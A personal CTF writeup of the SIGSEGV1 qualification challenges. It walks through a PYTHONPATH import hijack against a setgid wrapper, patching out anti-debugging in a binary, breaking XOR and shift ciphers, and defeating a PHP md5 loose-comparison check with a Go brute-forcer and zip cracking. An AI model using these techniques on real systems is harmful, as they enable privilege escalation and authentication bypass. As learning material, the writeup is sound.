SIGSEGV1 qualification CTF
A series of security challenges
October 12, 2018
After my r2con r2wars writeup, here's another writeup of a "challenge". This challenge is the Capture-The-Flag (CTF) pre-qualifications for the SIGSEGV1 conference in Paris. It felt a bit weird to have a conference registration limited to those who pass a certain challenge, but I was curious about what it would be like, so I thought: why not ?
Fun avec python
The first challenge was around python, one had to connect to a server, and try to capture the "flag", a file which you don't have access to, by exploiting a vulnerability in code on the server. This is what it looks like:
chall@ae805fd9fe99:~$ ls -l
total 16
-r--r----- 1 root chall-pwned 42 Oct 5 17:00 flag
-rwxr-xr-x 1 root root 307 Sep 20 00:21 hello-world.py
-rwxr-sr-x 1 root chall-pwned 6304 Oct 5 17:05 wrapper
The flag
file is the goal, but we can't read it with our permission level (chall
user. ). The wrapper
is a suid binary that just calls the hello-world.py script. This is the content of the script:
#!/usr/bin/python2.7
from colors import colors
def main():
print('This is an advanced hello-world')
print('The world is more joyful with colors')
print('So, here we are:')
print('{}Hello-World !{}'.format(colors.bcolors.OKBLUE, colors.bcolors.ENDC))
if __name__ == '__main__':
main()
One of the issue, is that when calling suid-binaries, you control the environment, and if it isn't cleared, you can control how the executables behave. Here, we are attacking the python script (it's the name of the challenge). The goal will be to use the import
clause of the script to run our one code.
I reproduced the environment locally to do some tests, here is my test.py
script:
#!/usr/bin/env python2
import colors
print("coucou")
And here is the colors.py
I used:
#!/usr/bin/env python
print open("flag", "r").readline()
Running test.py
on my machine shows that it's executing code in colors.py
before doing anything, so it works. Now, I need to upload colors.py
on the server, somewhere I can write files. Home isn't writable, so I just used /tmp
. I put colors.py
in /tmp/colors/
. Then, I used the PYTHONPATH
variable to run the script with the search path for modules modified:
chall@ae805fd9fe99:~$ PYTHONPATH=/tmp ./wrapper
sigsegv{518012356c8a2ed93b8d3e2416bb2274}
Traceback (most recent call last):
File "/home/chall/hello-world.py", line 3, in <module>
from colors import colors
ImportError: cannot import name colors
The rest of the script fails, but, we can clearly see the flag: sigsegv{518012356c8a2ed93b8d3e2416bb2274}
antistrings
This is a simple reverse engineering challenge, but with a few traps. I fell into all of them. The binary is backed up here if you want to see for yourself.
Despite the title being, "antistrings", I still went ahead and looked at the strings:
$ r2 linux_x64_chall_v1.bin
-- This is just an existentialist experiment.
[0x00400650]> iz
[Strings]
Num Vaddr Paddr Len Size Section Type String
000 0x00000b48 0x00400b48 147 148 (.rodata) ascii Strings won't help you that much.\n\n[+] Activating obfuscation layer 1...\n[+] Act]
001 0x00000bdc 0x00400bdc 12 13 (.rodata) ascii KIS\bJED@\rL]_
002 0x00000bed 0x00400bed 4 5 (.rodata) ascii \nBB^
003 0x00000bf2 0x00400bf2 8 9 (.rodata) ascii _YMCJ@];
004 0x00000c00 0x00400c00 15 16 (.rodata) ascii fIIO[K_YAO[Y^\@
005 0x00000c15 0x00400c15 4 5 (.rodata) ascii RZJX
006 0x00000c1a 0x00400c1a 13 14 (.rodata) ascii K($b%($!grdcA
007 0x00000c28 0x00400c28 9 10 (.rodata) ascii lHDG[XNOY
008 0x00000c32 0x00400c32 5 6 (.rodata) ascii F^AGG
009 0x00000c3d 0x00400c3d 5 6 (.rodata) ascii [\]TP
010 0x00000c48 0x00400c48 11 12 (.rodata) ascii ~\rz\b~OGOBCJ
011 0x00000c5b 0x00400c5b 4 5 (.rodata) ascii jm|v
012 0x00000c60 0x00400c60 10 11 (.rodata) ascii ^V^,-'-# L
013 0x00000c6b 0x00400c6b 10 11 (.rodata) ascii ~\rz\byFNM^K
014 0x00000c76 0x00400c76 5 6 (.rodata) ascii U_FVF
015 0x00000c80 0x00400c80 4 5 (.rodata) ascii \W]Z
So, the strings are encrypted. No big deal, I'll find later how.
[0x00400650]> aaa
...snip...8<...
[0x00400650]> s main
[0x00400aa2]> pdf
┌ (fcn) main 19
│ main (int argc, char **argv, char **envp);
│ ; DATA XREF from entry0 (0x40066d)
│ 0x00400aa2 4883ec08 sub rsp, 8
│ 0x00400aa6 b800000000 mov eax, 0
│ 0x00400aab e830ffffff call fcn.004009e0
│ 0x00400ab0 4883c408 add rsp, 8
└ 0x00400ab4 c3 ret
A short main()
(I skipped the libc entry point here), going to directly to another function.
[0x00400aa2]> s fcn.004009e0
[0x004009e0]> pdf 10
┌ (fcn) fcn.004009e0 16
│ fcn.004009e0 ();
│ ⁝ ; CALL XREF from main (0x400aab)
│ ⁝ 0x004009e0 4883ec28 sub rsp, 0x28 ; '('
│ ⁝ 0x004009e4 50 push rax
│ ⁝ 0x004009e5 31c0 xor eax, eax
│ ⁝ 0x004009e7 85c0 test eax, eax
│ ⁝ 0x004009e9 58 pop rax
│ ┌──< 0x004009ea 7502 jne 0x4009ee
│ ┌───< 0x004009ec 7401 je 0x4009ef
│ │││ ; CODE XREF from fcn.004009e0 (0x4009ea)
└ │└└─< 0x004009ee ebb9 jmp 0x4009a9 ; sub.BB_7c2+0x1e7
Here we can see the first trick: a jump to an unaligned address, after testing a very simple (always true) condition.
[0x004009e0]> s 0x4009ef
[0x004009ef]> pd 10
│ ; CODE XREF from fcn.004009e0 (0x4009ec)
│ 0x004009ef b900000000 mov ecx, 0
0x004009f4 ba01000000 mov edx, 1
0x004009f9 be00000000 mov esi, 0
0x004009fe bf00000000 mov edi, 0
0x00400a03 b800000000 mov eax, 0
0x00400a08 e823fcffff call sym.imp.ptrace
0x00400a0d 4885c0 test rax, rax
┌─< 0x00400a10 791e jns 0x400a30
And here we have the first anti-debug: ptrace(PTRACE_TRACEME, 0, 0, 0)
is called. The manpage says this is to Indicate that this process is to be traced by its parent.. In other words, this is used to detect if the process is currently being ptrace
d, which is the basic building block of all debuggers on Linux. On success, the program will print "not cool bro", and then exit.
My first idea, was to modify the binary (it doesn't seem to have any integrity verification built-in). We want to simulate ptrace()
returning an error; we'll just put -1 into eax
, the return register in this x86 call convention. This is done with:
[0x004009ef]> s 0x00400a08
[0x00400a08]> "wa sub eax, 1;nop;nop"
Don't forget to open the binary with r2
in write mode (-w
command line switch). Afterwards, the code looks like this:
0x004009ef b900000000 mov ecx, 0
0x004009f4 ba01000000 mov edx, 1
0x004009f9 be00000000 mov esi, 0
0x004009fe bf00000000 mov edi, 0
0x00400a03 b800000000 mov eax, 0
0x00400a08 83e801 sub eax, 1
0x00400a0b 90 nop
0x00400a0c 90 nop
0x00400a0d 4885c0 test rax, rax
┌─< 0x00400a10 791e jns 0x400a30
No more ptrace()
! This might be useful if I want to run the binary in a VM with gdb
or strace
. Let's continue on the execution path.
[0x004009ef]> s 0x400a30
[0x00400a30]> pd 10
;-- rip:
; CODE XREF from fcn.004009e0 (+0x30)
0x00400a30 bf480c4000 mov edi, str.z___OGOBCJ ; 0x400c48 ; "~\rz\b~OGOBCJ\x10E]\x13@]S\x17jm|v\x1c^V^,-'-# L"
0x00400a35 e80cfdffff call sub.strlen_746
0x00400a3a 4889c7 mov rdi, rax
0x00400a3d b800000000 mov eax, 0
0x00400a42 e879fbffff call sym.imp.printf ; int printf(const char *format)
The first obfuscated string appears here. It is then passed to a function (that calls strlen()
) that will transform it (decrypt?) before printing it. Let's see what this function looks like.
[0x00400a30]> pdf @sub.strlen_746
┌ (fcn) sub.strlen_746 124
│ sub.strlen_746 (char *arg1);
│ ; var char *s @ rsp+0x8
│ ; var void *local_10h @ rsp+0x10
│ ; var size_t size @ rsp+0x18
│ ; var int local_1ch @ rsp+0x1c
│ ; arg char *arg1 @ rdi
│ ; CALL XREFS from sub.BB_7c2 (0x4009a6, 0x4009c4)
│ ; CALL XREF from fcn.004009e0 (+0x3c)
│ ; CALL XREFS from rip (+0x5, +0x1c)
│ 0x00400746 4883ec28 sub rsp, 0x28 ; '('
│ 0x0040074a 48897c2408 mov qword [s], rdi ; arg1
│ 0x0040074f 488b442408 mov rax, qword [s] ; [0x8:8]=-1 ; 8
│ 0x00400754 4889c7 mov rdi, rax ; const char *s
│ 0x00400757 e854feffff call sym.imp.strlen ; size_t strlen(const char *s)
│ 0x0040075c 89442418 mov dword [size], eax
│ 0x00400760 8b442418 mov eax, dword [size] ; [0x18:4]=-1 ; 24
│ 0x00400764 4898 cdqe
│ 0x00400766 4889c7 mov rdi, rax ; size_t size
│ 0x00400769 e8a2feffff call sym.imp.malloc ; void *malloc(size_t size)
│ 0x0040076e 4889442410 mov qword [local_10h], rax
│ 0x00400773 c744241c0000. mov dword [local_1ch], 0
│ ┌─< 0x0040077b eb31 jmp 0x4007ae
│ │ ; CODE XREF from sub.strlen_746 (0x4007b6)
│ ┌──> 0x0040077d 8b44241c mov eax, dword [local_1ch] ; [0x1c:4]=-1 ; 28
│ ⁝│ 0x00400781 4863d0 movsxd rdx, eax
│ ⁝│ 0x00400784 488b442410 mov rax, qword [local_10h] ; [0x10:8]=-1 ; 16
│ ⁝│ 0x00400789 4801d0 add rax, rdx ; '('
│ ⁝│ 0x0040078c 8b54241c mov edx, dword [local_1ch] ; [0x1c:4]=-1 ; 28
│ ⁝│ 0x00400790 4863ca movsxd rcx, edx
│ ⁝│ 0x00400793 488b542408 mov rdx, qword [s] ; [0x8:8]=-1 ; 8
│ ⁝│ 0x00400798 4801ca add rdx, rcx ; '&'
│ ⁝│ 0x0040079b 0fb612 movzx edx, byte [rdx]
│ ⁝│ 0x0040079e 8b4c241c mov ecx, dword [local_1ch] ; [0x1c:4]=-1 ; 28
│ ⁝│ 0x004007a2 83c125 add ecx, 0x25 ; '%'
│ ⁝│ 0x004007a5 31ca xor edx, ecx
│ ⁝│ 0x004007a7 8810 mov byte [rax], dl
│ ⁝│ 0x004007a9 8344241c01 add dword [local_1ch], 1
│ ⁝│ ; CODE XREF from sub.strlen_746 (0x40077b)
│ ⁝└─> 0x004007ae 8b44241c mov eax, dword [local_1ch] ; [0x1c:4]=-1 ; 28
│ ⁝ 0x004007b2 3b442418 cmp eax, dword [size] ; [0x18:4]=-1 ; 24
│ └──< 0x004007b6 7cc5 jl 0x40077d
│ 0x004007b8 488b442410 mov rax, qword [local_10h] ; [0x10:8]=-1 ; 16
│ 0x004007bd 4883c428 add rsp, 0x28 ; '('
└ 0x004007c1 c3 ret
Wow, that's a lot of code. Let's take some time to process this. The first part saves the size of the argument in local variable size, then allocates a second buffer of the same size.
The second part will loop over both buffers, and put in the decoded buffer, each character, like this:
decoded[i] = a[i] ^ 0x25
It then returns the decoded string. I wrote a small python program to reproduce this:
#!/usr/bin/env python3
import sys
a = sys.stdin.read()
print("".join([chr(ord(a[i]) ^ (i+0x25)) for i in range(len(a)) ]) )
We can then use this from r2 to decode a random string:
[0x00400a30]> pr 48 @ str.fIIO_K_YAO_Y | ./decode.py
Congratulations! You have the flag :-)
Hum, this looks interesting. Let's rename the r2 string flag to remember this, it will be useful later to locate where this is printed:
[0x00400a30]> fr str.fIIO_K_YAO_Y "str.Congratulations! You have the flag :-)"
Let's continue where we left off: we wanted to decode, then print a string. Let's see what it was:
[0x00400a30]> pr 48 @ str.z___OGOBCJ |./decode.py
[+] Welcome to the RTFM challenge
Nice ! This is the programs's opening prompt. Let's continue with the next printed string:
[0x00400a42]> pr 48 @ str.z__yFNM_K |./decode.py
[+] Please enter the flag: @ACXG~
GHIBKLMV����ST
Once this is shown, we have the read()
on stdin that asks for the flag:
0x00400a6d 4889e0 mov rax, rsp
0x00400a70 ba14000000 mov edx, 0x14 ; 20
0x00400a75 4889c6 mov rsi, rax
0x00400a78 bf00000000 mov edi, 0
0x00400a7d e85efbffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
And then another unaligned jump trick to fool the reader, but reversed (eax != 0):
0x00400a82 50 push rax
0x00400a83 31c0 xor eax, eax
0x00400a85 85c0 test eax, eax
0x00400a87 58 pop rax
┌─< 0x00400a88 7502 jne 0x400a8c
┌──< 0x00400a8a 7401 je 0x400a8d
││ ; CODE XREF from rip (+0x58)
┌─└─> 0x00400a8c eb48 jmp 0x400ad6
Followed by a function call:
[0x00400a42]> pd 10 @ 0x400a8c
; CODE XREF from rip (+0x58)
┌─< 0x00400a8c eb48 jmp 0x400ad6
│ 0x00400a8e 89e0 mov eax, esp
│ 0x00400a90 4889c7 mov rdi, rax
│ 0x00400a93 e82afdffff call sub.BB_7c2
In this function we'll see something curious:
[0x00400650]> s sub.BB_7c2
[0x004007c2]> pd 30
┌ (fcn) sub.BB_7c2 396
│ sub.BB_7c2 (int arg1);
│ ; var int local_8h @ rsp+0x8
│ ; var void *buf @ rsp+0x10
│ ; var unsigned int fildes @ rsp+0x28
│ ; var signed int local_2ch @ rsp+0x2c
│ ; arg int arg1 @ rdi
│ ; CALL XREF from fcn.004009e0 (+0xb3)
│ 0x004007c2 4883ec38 sub rsp, 0x38 ; '8'
│ 0x004007c6 48897c2408 mov qword [local_8h], rdi ; arg1
│ 0x004007cb c744242c20a1. mov dword [local_2ch], 0x7a120 ; [0x7a120:4]=-1
│ ┌─< 0x004007d3 eb47 jmp 0x40081c
│ │ ; CODE XREF from sub.BB_7c2 (0x400821)
│ ┌──> 0x004007d5 836c242c01 sub dword [local_2ch], 1
│ ⁝│ 0x004007da be00000000 mov esi, 0 ; int oflag
│ ⁝│ 0x004007df bfed0b4000 mov edi, str.BB ; 0x400bed ; "\nBB^\x06_YMCJ@];" ; const char *path
│ ⁝│ 0x004007e4 b800000000 mov eax, 0
│ ⁝│ 0x004007e9 e852feffff call sym.imp.open ; int open(const char *path, int oflag)
│ ⁝│ 0x004007ee 89442428 mov dword [fildes], eax
│ ⁝│ 0x004007f2 837c242800 cmp dword [fildes], 0
│ ┌───< 0x004007f7 7918 jns 0x400811
│ │⁝│ 0x004007f9 488d4c2410 lea rcx, [buf] ; 0x10 ; 16
│ │⁝│ 0x004007fe 8b442428 mov eax, dword [fildes] ; [0x28:4]=-1 ; '(' ; 40
│ │⁝│ 0x00400802 ba0a000000 mov edx, 0xa ; size_t nbyte
│ │⁝│ 0x00400807 4889ce mov rsi, rcx ; void *buf
│ │⁝│ 0x0040080a 89c7 mov edi, eax ; int fildes
│ │⁝│ 0x0040080c e8cffdffff call sym.imp.read ; ssize_t read(int fildes, void *buf, size_t nbyte)
│ │⁝│ ; CODE XREF from sub.BB_7c2 (0x4007f7)
│ └───> 0x00400811 8b442428 mov eax, dword [fildes] ; [0x28:4]=-1 ; '(' ; 40
│ ⁝│ 0x00400815 89c7 mov edi, eax ; int fildes
│ ⁝│ 0x00400817 e8b4fdffff call sym.imp.close ; int close(int fildes)
│ ⁝│ ; CODE XREF from sub.BB_7c2 (0x4007d3)
│ ⁝└─> 0x0040081c 837c242c00 cmp dword [local_2ch], 0
│ └──< 0x00400821 7fb2 jg 0x4007d5
open()
is called on a file, which once decoded the name is /dev/urandom
. But the filename is never decoded. Is this a bug ? Or a last minute modification ? Then, 10 bytes are read()
from this file. The file is closed. And this is done again. 0x7a120
times ! This is another anti-debug, probably designed to slow down strace
. I tried running the binary (in a disposable VM!); strace
is indeed very slow. Running the binary directly takes less than 5 seconds to pass this code. I'm guessing that it was probably decided that actually opening and reading the blocks in /dev/urandom
would be too slow, or less portable. Or it's just a bug :smile:
Since I had already disabled an anti-debug, I disable this one as well:
[0x004007c2]> s 0x004007cb
[0x004007cb]> "wa mov dword [rsp+0x2c], 0"
By setting the loop counter to 0 instead of 0x7a120, this anti-debug code is never run.
After this, there's another unaligned jump trick, and then the value that was read()
previously is finally analyzed:
[0x0040082e]> pd 20 @ 0x40082e
│ ; CODE XREF from sub.BB_7c2 (0x40082b)
│ 0x0040082e 488b442408 mov rax, qword [local_8h] ; [0x8:8]=-1 ; 8
0x00400833 0fb600 movzx eax, byte [rax]
0x00400836 3c73 cmp al, 0x73 ; 's' ; 115
┌─< 0x00400838 0f8581010000 jne 0x4009bf ; sub.BB_7c2+0x1fd
│ 0x0040083e 488b442408 mov rax, qword [rsp + 8] ; [0x8:8]=-1 ; 8
│ 0x00400843 4883c001 add rax, 1
│ 0x00400847 0fb600 movzx eax, byte [rax]
│ 0x0040084a 3c69 cmp al, 0x69 ; 'i' ; 105
┌──< 0x0040084c 0f856d010000 jne 0x4009bf ; sub.BB_7c2+0x1fd
││ 0x00400852 488b442408 mov rax, qword [rsp + 8] ; [0x8:8]=-1 ; 8
││ 0x00400857 4883c002 add rax, 2
││ 0x0040085b 0fb600 movzx eax, byte [rax]
││ 0x0040085e 3c67 cmp al, 0x67 ; 'g' ; 103
┌───< 0x00400860 0f8559010000 jne 0x4009bf ; sub.BB_7c2+0x1fd
It looks like a character-by-character comparison of the buffer read, starting with 's', then 'i', then 'g'. Is this the flag ? We know (it's in the rules) that the flags are in the format sigsegv{FLAG}, so this looks like it ! Two "unaligned jumps" later, we can gather all the characters for the flag. This is left as an exercise for the reader.
This was a quite tedious debug. In fact, I could have ignored most of this, and jumped directly to the interesting part: the analysis of the read()
result. Instead, I spent a lot of time disabling anti-debugs, analyzing the decryption function, and I even played a bit with ESIL emulation (not shown here). It was fun, but it could have been solved much more quickly. The top challenger did it ~4 minutes, while it took me a few hours, but I learned a lot along the way !
Javascript obfusqué
This challenge starts quite simply. You can find the backed-up source here. Just opening the developer console in the browser allows you to quickly see the whole unpacked code (formatted a bit here):
function Kod(s, pass) {
var i=0;
var BlaBla="";
for(j=0; j<s.length; j++) {
BlaBla+=String.fromCharCode((pass.charCodeAt(i++))^(s.charCodeAt(j)));
if (i>=pass.length) i=0;
}
return(BlaBla);
}
function f(form){
var pass=document.form.pass.value;
var hash=0;
for(j=0; j<pass.length; j++){
var n= pass.charCodeAt(j);
hash += ((n-j+33)^31025);
}
if (hash == 529387) {
var Secret =""+"\x4f\x01\x13\x1e\x09\x59\x34\x09\x0b\x05\x26\x53\x31\x41\x5a\x18\x0e\x53\x1d\x15\x1c\x10\x11\x13\x5b\x06\x16\x69\x15\x29\x55\x1d\x55\x5d\x06\x1d\x0e\x1f\x0c\x14\x13\x5b\x06\x16\x69\x1e\x2a\x40\x5a\x1d\x18\x53\x19\x06\x00\x16\x02\x56\x0a\x1f\x16\x69\x07\x30\x14\x1b\x0a\x5d\x07\x1b\x08\x06\x13\x02\x56\x0b\x05\x06\x3b\x53\x33\x55\x16\x10\x19\x16\x1b\x47\x1f\x00\x47\x15\x13\x0b\x1f\x25\x16\x2b\x53\x1f\x45\x52\x1b\x1d\x0a\x1f\x5b"+"";
var s=Kod(Secret, pass);
document.write (s);
} else {
alert ('Wrong password!');
}
}
The function f()
is called on form submit. It first computes a custom checksum of the password, and if it matches, it tries to use to decrypt a secret with Kod()
. This custom checksum contains a core XOR, that is run on very character, before adding to the total sum. We know that there's a good chance that each character's charCode will be < 127 (in the ASCII space), so we can actually use the checksum to deduce the size of the password (the upper bits being more significant):
529387/31025 = 17.06323932312651
It's 17 characters !
The decode function is Kod()
; it is run as a fixed-key XOR with the password as key, and the Secret
variable as message. This should be crypto 101 (well, almost), and if not, you can follow the cryptopals challenges to learn how to do that. Since I wasn't so certain that I could do it on my own in a short-enough time, I just reused someone else's solution with the key size I already found. It didn't give a perfect decrypt, but it was close enough to help me find the flag.
In retrospect, I could have also used the fact that the start of the flags is always the same ('sigsegv{'
), and then decode it by hand, but this was good enough.
In the JS console of your browser, you can see how to decrypt the secret:
Kod(Secret, flag)
"<html>Bravo tu as trouve le flag, utilise le mot de passe que tu as trouve pour valider le challenge</html>"
Un nouveau dialecte
This challenge, was in the "Crypto" section. Wait, didn't we have crypto in the two last challenges as well ?
The goal was to decode this new "dialect":
ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ
As I do in most challenges, I put the content in a file (named "file", I also lack imagination), loaded it in ipython3
, and started visualizing and massaging the data
Python 3.6.6 (default, Jul 19 2018, 14:25:17)
Type 'copyright', 'credits' or 'license' for more information
IPython 6.4.0 -- An enhanced Interactive Python. Type '?' for help.
In [1]: a=open("file", "rb").read()
In [2]: print(a)
b'\xc8\x83\xc7\xb9\xc7\xb7\xc8\x83\xc7\xb5\xc7\xb7\xc8\x86\xc8\x8b\xc7\x9c\xc7\x91\xc7\xa3\xc7\xa4\xc7\x95\xc7\x97\xc7\x91\xc7\x93\xc7\x95\xc7\xa3\xc7\xa4\xc7\xa0\xc7\x91\xc7\xa3\xc7\xa3\xc7\x99\xc7\x96\xc7\x91\xc7\x93\xc7\x99\xc7\x9c\xc7\x95\xc8\x8d'
In [3]: print(str(a, encoding="utf-8"))
ȃǹǷȃǵǷȆȋǜǑǣǤǕǗǑǓǕǣǤǠǑǣǣǙǖǑǓǙǜǕȍ
In [4]: b = [ a[i:i+2] for i in range(0, len(a), 2) ]
In [5]: b
Out[5]:
[b'\xc8\x83',
b'\xc7\xb9',
b'\xc7\xb7',
b'\xc8\x83',
b'\xc7\xb5',
b'\xc7\xb7',
b'\xc8\x86',
b'\xc8\x8b',
b'\xc7\x9c',
b'\xc7\x91',
b'\xc7\xa3',
b'\xc7\xa4',
b'\xc7\x95',
b'\xc7\x97',
b'\xc7\x91',
b'\xc7\x93',
b'\xc7\x95',
b'\xc7\xa3',
b'\xc7\xa4',
b'\xc7\xa0',
b'\xc7\x91',
b'\xc7\xa3',
b'\xc7\xa3',
b'\xc7\x99',
b'\xc7\x96',
b'\xc7\x91',
b'\xc7\x93',
b'\xc7\x99',
b'\xc7\x9c',
b'\xc7\x95',
b'\xc8\x8d']
I first analyzed the UTF-8 encoded codepoints (as binary data), but was soon lucky, and found that the Unicode codepoints (not their UTF-8 encoded version) were in fact all in the same range, hinting to a simple Caesar cipher. Here is the final visualizing and decoding program:
#!/usr/bin/env python3
# coding: utf-8
s=open("file", "r").read()
for i in s:
print("{} {:04x}: {:16b}".format(i, ord(i), ord(i)), end='\t')
x = ord(i) - 0x100 - 144
print("{:09b} {} {}".format(x, x, chr(x)))
print("".join([chr(ord(i) - 400) for i in s]))
Note that this was very easy because I'm used to launch python3
by default, which is unicode-native; ord()
behaves as it should. Anyone used to python2, would be in a bit more pain, since the characters would have been interpreted byte-by-byte.
La simplicité
Under the "simplicity" title, this one might be the longest to solve. To start, you're given a "simple" website, that looks like this:
$ curl http://51.158.73.218:8880/
<html>
<head>
<title>Un site simple</title></title>
</head>
<body>
<center><iframe width="560" height="315" src="https://www.youtube.com/embed/2bjk26RwjyU?rel=0&controls=0&showinfo=0" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe></center>
<!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
<!-- Un formulaire c'était pas assez simple donc on en a pas mis -->
</body>
</html>
I did quite a lot of exploration on this: I tried different http methods (to no avail), I discovered that the name of the file was "index.php". I tried a few standard "admin" pages. Then I moved on to the other challenges, keeping this one last.
When I came back to it, I had an epiphany. The solution to unlock the first step was simple, in retrospect (as announced):
$ curl http://51.158.73.218:8880/robots.txt
backup.zip
Oh. So I download this zip file, (backup here), and it's a password-protected zip containing an index.php:
$ unzip backup.zip
Archive: backup.zip
[backup.zip] index.php password:
No solution here, one has to use bruteforce to crack this zip. I download john the ripper, and extract the crackable hash:
$ ./JohnTheRipper/run/zip2john backup.zip > john.hash
ver 2.0 efh 5455 efh 7875 backup.zip->index.php PKZIP Encr: 2b chk, TS_chk, cmplen=453, decmplen=680, crc=70C7CB88
$ cat john.hash
backup.zip:$pkzip2$1*2*2*0*1c5*2a8*70c7cb88*0*43*8*1c5*70c7*bce4*01f43e1d0eb0118661d22e480e38736de7c321d3ac1cf086601594c4ab54ebc7af0ad5ea01c8b64bda21aee19533a09808c0e7892fdb08f8df9644eeefc9aabe92b3c1cb10fb981090365d55229da292afba120f388d25a56e52c91b42af567d2ee897c5bd979b673a99fe187e4064f438165815d29fad2d1a7edbdf46ee2ff99afb546e1626cbb57897b6a108a3fb108495ec508243bffe3d050efe1b9aadf700695f8aca72e4e1977f827702ec5840fbe1559e0ac1e646323ea051ee69257030c3b33d305d9ab6f70dc600a2d4cc07482df8d95e4dd8741082540e3b2ec988eab2c99a595927eb31cc589d8bd28068ddd375588c668f52f5896d45e42de0d1933dc390a5c2a5ee3b8d30b91b763bb77892651dd9241bf03dde65ad8b6acee2bcb3942dc800aa3350d2f894c32fc0dcba5164d9db59dd09044d28b44181a19398d27c64b65bd1c8e4cdce21eeac513172d340ca4b54baf5570921dc182e3b02b0ff8d0b0ac4070a0715f6300f8fb99ffdc665270cc98fae8d28f3727742b79e2bd9392f35e4564a243234e9cf502beb0e3572c2c83a33b68c56cc317aece233f99a02838c9c562ebb3271d58aa6bb653b43803c9188b1c737cfa827c533ff301e453fb111*$/pkzip2$:::::backup.zip
Then I run john on it:
$ ./JohnTheRipper/run/john --show john.hash
backup.zip:passw0rd:::::backup.zip
1 password hash cracked, 0 left
This runs almost instantly; so the password is "passw0rd". We can unzip the file, and get the source code of index.php
. This is the same page as before, with the more interesting parts shown here:
<?php
include "auth.php";
?>
[…]
<?php
if(isset($_POST["h1"]))
{
$h1 = md5($_POST["h1"] . "Shrewk");
echo "h1 vaut: ".$h1."</br>";
if($h1 == "0")
{
echo "<!--Bien joué le flag est ".$flag."-->";
}
}
?>
[…]
So, there's a POST parameter h1, which is hashed with a "Shrewk" salt, and then compared to the string "0". Wait, what ? How can md5() return "0" ?
The php documentation doesn't mention anything of the sort. But you can quickly find that the comparison operation "==" isn't recommended to compare strings, because of type juggling. Indeed, a string like "1e3", will be resolved to the integer 1000, for example. A secure string comparison should use "===".
So, this might be the core of the challenge. Maybe what we need is an md5 hash string that starts with many "0", then "e" or "E", and then is followed by only digits ? It looks like we need to crack some md5 as well.
I installed hashcat, and started looking at the documentation. I found a lot of ways to parametrize the input to be hashed, but no way to filter the hashes in output to look like a given format. I attempted to generate a lot of hashes in hope of finding a random password that would match one of them, with the given program:
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
int main() {
uint64_t i;
unsigned int seed;
for (i = 0; i < (1<< 29); i++)
printf("0e%010d%010d%010d:Shrewk\n", rand_r(&seed), rand_r(&seed), rand_r(&seed));
}
This writes data in the hashcat format hash:salt. I used it to generate a lot of potential hashes, but hashcat needs to load all of them into memory, and whether you have 1GB or 1TB of RAM, this is still is many order of magnitudes smaller than the space I want to explore. So while hashcat was running, I started working on a more exhaustive exploration.
I decided to use a go program, because this is an embarrassingly parallel problem, and will be much easier to crack with go routines. First, here is the match function, to test if a hex-encoded hash has the format we want:
func match(x string) bool {
i := 0
for x[i] == '0' {
i++
}
if i < 1 {
return false
}
if x[i] != 'e' && x[i] != 'E' {
return false
}
for i++; i < len(x) && (x[i] >= '0' && x[i] <= '9'); i++ {
}
return i == len(x)
}
And its corresponding test:
func TestMatch(t *testing.T) {
samples := []struct {
v string
ret bool
}{
{"000e1234123456781234567812345678", true},
{"0a0e1234123456781234567812345678", false},
{"00E01234123456781234567812345678", true},
{"00EE1234123456781234567812345678", false},
{"00E01234123456781234567812345ab8", false},
{"0e000000000000000000000000000000", true},
}
for i := range samples {
if match(samples[i].v) != samples[i].ret {
t.Fatal("Error: ", samples[i].v, samples[i].ret)
}
}
}
This is the only function that was tested because of how core it was to finding a solution. Note that it might have been faster to work directly on byte data instead of converting the md5 to a hex-encoded string, but I found it an acceptable compromise to keep the code readable and correct.
The rest of the code is just an exhaustive exploration of password space (with the salt), with a recursive core.
func core2(share, max int) {
const alphabet = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwyxz.;/-{}"
const salt = "Shrewk"
for size := share; ; size += max {
if size == 0 {
continue
}
b := make([]byte, size+len(salt))
for c := 0; c < size; c++ {
b[c] = alphabet[0]
}
for c := 0; c < len(salt); c++ {
b[c+len(b)-len(salt)] = salt[c]
}
var charloop func(int, func())
charloop = func(i int, f func()) {
for c := 0; c < len(alphabet); c++ {
b[i] = alphabet[c]
if i > 0 {
charloop(i-1, f)
} else {
f()
}
}
}
//recursion is much easier
charloop(size-1, func() {
h := md5.Sum(b)
he := hex.EncodeToString(h[:])
if match(he) {
fmt.Println("Found match: ", string(b), he)
os.Exit(0)
return
}
})
}
}
Particular attention was given on minimizing the allocations, to reduce the performance impact. This is why the core function works on a single []byte
slice. The hex.EncodeToString does many allocations though.
The main function does the work sharing, in a naive way: the size of the password is used to slice the work between goroutines:
func main() {
c := make(chan struct{})
for i := 0; i < runtime.NumCPU(); i++ {
go func() {
core2(i, runtime.NumCPU())
c <- struct{}{}
os.Exit(0)
}()
}
<-c
}
This means, that the program will be non-deterministic, depending on the number of cores we have, and the particular scheduling of goroutines.
This code finds a password on my 2012 laptop in about 3 minutes.
$ time ./crack
Found match: KgeM5000Shrewk 0e957579856924481004771378652894
real 2m45.885s
user 10m28.607s
sys 0m2.147s
And let's test this password we found:
$ curl -s -d h1=KgeM5000 http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e957579856924481004771378652894</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
Unsurprisingly, it was much faster on a modern 8 core Xeon; and it found another password first because of the work sharing structure :
$ curl -s -d h1=QM8.B0 http://51.158.73.218:8880/index.php |grep flag
h1 vaut: 0e893977776066512259427456189998</br><!--Bien joué le flag est sigsegv{a1a29afa647a20758e64b49d8eb453f4}--><!-- Si une méthode ne fonctionne pas il faut en utiliser une autre -->
And that's it for the challenges !